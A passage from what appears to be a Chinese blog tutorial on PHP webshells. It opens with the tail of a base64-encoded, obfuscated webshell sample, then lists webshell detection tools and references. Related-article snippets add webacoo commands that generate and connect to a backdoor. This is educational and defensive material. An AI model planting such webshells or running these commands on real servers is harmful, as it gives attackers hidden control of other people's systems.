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'\x29\x29\x29\x3B",".");
?>

9、加密

这里不再介绍了

五、种马之后

由于被入侵过,对之前的文件有过研究,截几张图大家看看

基本上就可以为所欲为了

六、检测工具

编号 名称 参考链接
1 网站安全狗网马查杀 http://download.safedog.cn/download/software/safedogwzApache.exe
2 D盾 Web查杀 http://www.d99net.net/down/WebShellKill_V2.0.9.zip
3 深信服WebShellKillerTool http://edr.sangfor.com.cn/tool/WebShellKillerTool.zip
4 BugScaner killwebshell http://tools.bugscaner.com/killwebshell/
5 河马专业版查杀Webshell http://n.shellpub.com/
6 OpenRASPWEBDIR+检测引擎 https://scanner.baidu.com
7 深度学习模型检测PHP Webshell http://webshell.cdxy.me/

上面工具非常好用,95%的基本都能检测出来,知道webshell是什么样的,就可以根据相应的特征找出来

参考文档

http://php.net/manual

https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html

https://joychou.org/web/webshell.html

http://www.likesec.com/2017/12/08/webshell/

http://blog.safedog.cn/?p=68

http://www.freebuf.com/articles/web/155891.html

http://www.freebuf.com/articles/web/9396.html

https://blog.csdn.net/xysoul/article/details/49791993

https://cloud.tencent.com/developer/article/1097506

http://www.91ri.org/12824.html

http://www.3years.cc/index.php/archives/18/

http://www.cnblogs.com/LittleHann/p/3522990.html

https://habrahabr.ru/post/215139/

https://stackoverflow.com/questions/14674834/php-convert-string-to-hex-and-hex-to-string

https://xz.aliyun.com/t/2335

关于PHP中的webshell的更多相关文章

  1. kali中的webshell工具--webacoo

    webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell的工具 WeBaCoo(Web Backdoor Cookie) 特点及使用方法 类终端的shell 编 ...

  2. kali中的webshell

    webacoo -g 生成一句话 -o 输出文件 -r 不混淆代码 -t 连接模式 -u 制定URL 生成一句话 webacoo -g -o a.php 连接一句话 webacoo -t -u htt ...

  3. Deformity ASP/ASPX Webshell、Webshell Hidden Learning

    catalog . Active Server Page(ASP) . ASP.NET . ASP WEBSHELL变形方式 . ASPX WEBSHELL变形方式 . webshell中常见的编码转 ...

  4. 【服务器防护】WEB防护 - WEBSHELL攻击探测【转载】

    原文:http://www.2cto.com/Article/201511/451757.html 1. 什么是webshell?     基于b/s架构的软件部署在Internet上,那么安全性是必 ...

  5. 利用“进程注入”实现无文件复活 WebShell

    引子 上周末,一个好兄弟找我说一个很重要的目标shell丢了,这个shell之前是通过一个S2代码执行的漏洞拿到的,现在漏洞还在,不过web目录全部不可写,问我有没有办法搞个webshell继续做内网 ...

  6. 11. 几点基于Web日志的Webshell检测思路

    摘要: Web日志记录了网站被访问的情况,在Web安全的应用中,Web日志常被用来进行攻击事件的回溯和取证.Webshell大多由网页脚本语言编写,常被入侵者用作对网站服务器操作的后门程序,网站被植入 ...

  7. webshell检测方法归纳

    背景 webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB ...

  8. webshell学习

    参考文章: https://www.bilibili.com/video/BV1T4411t7BW?p=14 https://blog.csdn.net/mmmsss987/article/detai ...

  9. 【原创】利用“进程注入”实现无文件不死webshell

    引子 上周末,一个好兄弟找我说一个很重要的目标shell丢了,这个shell之前是通过一个S2代码执行的漏洞拿到的,现在漏洞还在,不过web目录全部不可写,问我有没有办法搞个webshell继续做内网 ...

随机推荐

  1. DDD领域模型系统的工作流(十四)

    在自定义的Windows窗体中运行工作流:(把工作流的代码放入到文本框中) public partial class Form1 : Form { public Form1() { Initializ ...

  2. SqlServer基础语法(三)

    1.数据库备份的方法: 完整数据库备份GPOSDB 文件大小:23MB 日志备份 GPOSDB日志备份文件大小:211KB --完整备份 Backup DATABASE GPOSDB To disk= ...

  3. huffman编解码英文文本[Python]

    对英文文本的字母进行huffman编码,heapq优先队列构建huffman树 python huffman.py source.txt result.txt import sys import he ...

  4. Zookeeper笔记(一)初识Zookeeper

    为什么需要Zookeeper Zookeeper是一个典型的分布式数据一致性的解决方案,分布式应用程序可以基于它实现诸如数据发布/订阅.负载均衡.命名服务.分布式协调/通知.集群管理.Master选举 ...

  5. java之定时器任务Timer用法

    在项目开发中,经常会遇到需要实现一些定时操作的任务,写过很多遍了,然而每次写的时候,总是会对一些细节有所遗忘,后来想想可能是没有总结的缘故,所以今天小编就打算总结一下可能会被遗忘的小点: 1. pub ...

  6. JavaSE| 数据类型| 运算符| 进制与补码反码等

    JavaSE JavaSE是学习JavaWeb.JavaEE以及Android开发的基础 边听边思考边做“笔记” 不要完全依赖书和视频: 捷径:敲.狂敲: 规范:加注释: 难点,不懂的记录下时间再回头 ...

  7. 动态产生DataSource------待整理

    1. https://www.cnblogs.com/wsss/p/5475057.html https://www.cnblogs.com/jiligalaer/p/5418874.html htt ...

  8. 070 关于HBase的概述

    1.hbase的特点 ->数据存储量可以达到亿级别数据维持在秒级 ->按列存储的数据库 ->能够存储上百万列 ->hbase的底层存储依赖于HDFS ->如何扩展hbas ...

  9. KMS命令激活VOL版本Office2016

    1.命令行下进入Office2016的安装目录 2.设置KMS服务器:cscript ospp.vbs /sethst:kms.landiannews.com kms.landiannews.com是 ...

  10. Win10 下 hadoop3.0.0 单机部署

    前言 因近期要做 hadoop 有关的项目,需配置 hadoop 环境,简单起见就准备进行单机部署,方便开发调试.顺便记录下采坑步骤,方便碰到同样问题的朋友们. 安装步骤 一.下载 hadoop-XX ...